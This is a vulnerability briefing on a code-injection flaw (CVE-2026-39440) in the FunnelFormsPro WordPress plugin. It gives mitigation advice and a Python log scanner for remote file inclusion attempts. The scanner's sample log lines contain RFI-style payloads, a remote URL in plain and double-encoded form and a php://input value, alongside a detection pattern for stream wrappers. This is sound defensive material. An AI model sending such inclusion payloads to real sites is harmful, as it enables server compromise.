Part of Lyceum Intelligence — deep-research In Focus reports → · Lyceum Corpus — ask the documents →


CVE-2026-39440 -- CVSS 9.9 Vulnerability Briefing

CVE-2026-39440 | CVSS 9.9 (Critical) | Exploit: No known exploit

What Is It

CVE-2026-39440 is a code injection vulnerability in the FunnelFormsPro WordPress plugin by Funnelforms LLC. All versions up to and including 3.8.1 are affected. A remote attacker can cause the plugin to include and execute attacker-supplied code on the hosting server.

Technical Detail

The flaw is improper control of code generation in FunnelFormsPro, classified as CWE-94 (Code Injection), and is specifically described as Remote Code Inclusion: the plugin can be made to fetch a resource or payload chosen by the attacker and execute it in the context of the web server process. The exact vulnerable code path is not given here; exploitation likely involves a plugin parameter or other input that reaches an include, require or code-evaluation call without adequate validation or sanitization, so that a value such as a remote URL or a PHP stream wrapper is treated as code to load. Successful exploitation yields full remote code execution as the web-server user, which can lead to complete site compromise, data exfiltration, or lateral movement within the hosting environment.

Exploitation Status

No known exploit has been publicly documented or confirmed as of April 30, 2026, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog. The absence of a public exploit should not be read as difficulty of exploitation: remote inclusion bugs are typically trivial to trigger once the affected parameter is known. The CVSS 9.9 score and the nature of the flaw make it a likely target for opportunistic attackers who routinely scan for vulnerable WordPress plugins.

Who Is Targeting This

No specific threat actor attribution at this time. Vulnerabilities of this class in WordPress plugins are typically picked up by automated scanning campaigns and opportunistic actors rather than advanced persistent threat groups, but no confirmed campaigns or attributed actors have been identified in connection with this CVE.

What To Do

Update FunnelFormsPro to a fixed release as soon as Funnelforms LLC ships one; all versions up to and including 3.8.1 are confirmed affected. Until a patched version is available, deactivate and remove the plugin from every WordPress installation rather than leaving it installed but inactive, since files under wp-content/plugins remain reachable over HTTP even when the plugin is disabled. Audit web-server access logs for requests to plugin endpoints whose parameters carry remote URLs or PHP stream wrappers (http://, https://, php://, data:), including URL-encoded and double-encoded forms, and check the host for unexpected outbound connections originating from the PHP or web-server process. Enable web application firewall rules that block remote file inclusion patterns as a compensating control, but treat them as a stopgap rather than a fix. Given the critical severity, treat this as a patch-now priority regardless of current exploitation status.
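The log audit described above, as an added example that is not code from Lyceum Intelligence or Funnelforms LLC: it parses combined-format access-log lines, decodes query parameters (including double URL-encoding, which attackers use to slip past naive filters), and flags values that begin with a remote scheme or a PHP stream wrapper, which is the shape a remote inclusion payload takes. The sample log lines are constructed for illustration, and the plugin directory prefix used to scope findings is an assumption, since the briefing does not state the plugin's slug.

```python
"""Scan web-server access logs for remote file inclusion (RFI) attempts.

Added example, not code from the briefing's author or from the plugin vendor.
Assumes Apache/Nginx "combined" log format. SAMPLE_LOG is constructed.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format: host ident user [time] "METHOD target HTTP/x" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# A parameter value starting with one of these turns a PHP include()/require()
# into fetch-and-execute: remote schemes plus the stream wrappers PHP exposes.
RFI_VALUE_RE = re.compile(
    r'^(?:https?|ftps?|php|data|expect|phar|zip|glob|compress\.\w+)://|^data:',
    re.IGNORECASE,
)

# Assumed plugin directory; the real slug is not given in the advisory.
PLUGIN_PATH_HINT = "/wp-content/plugins/funnelforms"

# Constructed sample: two hits against the plugin path (plain and double-encoded),
# one benign request, one wrapper-based attempt elsewhere, one URL not at value start.
SAMPLE_LOG = """\
203.0.113.10 - - [30/Apr/2026:10:01:02 +0000] "GET /wp-content/plugins/funnelforms/x.php?tpl=http://198.51.100.7/s.txt HTTP/1.1" 200 512 "-" "curl/8.0"
203.0.113.10 - - [30/Apr/2026:10:01:05 +0000] "GET /wp-content/plugins/funnelforms/x.php?tpl=%2568%2574%2574%2570%253a%252f%252f198.51.100.7%252fs.txt HTTP/1.1" 200 512 "-" "curl/8.0"
198.51.100.22 - - [30/Apr/2026:10:02:00 +0000] "GET /?p=12 HTTP/1.1" 200 7480 "-" "Mozilla/5.0"
203.0.113.11 - - [30/Apr/2026:10:03:00 +0000] "GET /index.php?file=php://input HTTP/1.1" 500 0 "-" "python-requests/2.31"
203.0.113.12 - - [30/Apr/2026:10:04:00 +0000] "GET /search?q=https+is+https://example.org/ HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""


def decode_fully(value, rounds=3):
    """Undo repeated URL encoding until the value stops changing (bounded)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(target):
    """Return [(name, decoded_value)] for query parameters that look like RFI payloads."""
    query = urlsplit(target).query
    hits = []
    for name, raw in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already decodes one layer; decode_fully handles double encoding.
        value = decode_fully(raw).strip()
        if RFI_VALUE_RE.search(value):
            hits.append((name, value))
    return hits


def scan(log_text):
    """Return one finding per request carrying an RFI-looking parameter."""
    findings = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not a combined-format line; skip rather than guess
        target = match.group("target")
        hits = suspicious_params(target)
        if not hits:
            continue
        findings.append({
            "ip": match.group("ip"),
            "time": match.group("ts"),
            "status": int(match.group("status")),
            "path": urlsplit(target).path,
            "in_plugin": PLUGIN_PATH_HINT in target,  # scoped to the assumed plugin dir
            "params": hits,
        })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        flag = "PLUGIN" if finding["in_plugin"] else "other"
        print(f'{finding["time"]} {finding["ip"]} [{flag}] {finding["path"]} '
              f'status={finding["status"]} params={finding["params"]}')
```

Run it against real logs with `scan(open("access.log").read())`; a 200 response to a flagged request against the plugin path is the case to escalate, since it suggests the include succeeded. The scanner only sees what reaches the web server, so pair it with a check for unexpected outbound connections from the PHP process, which is where a fetched payload would first show up.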
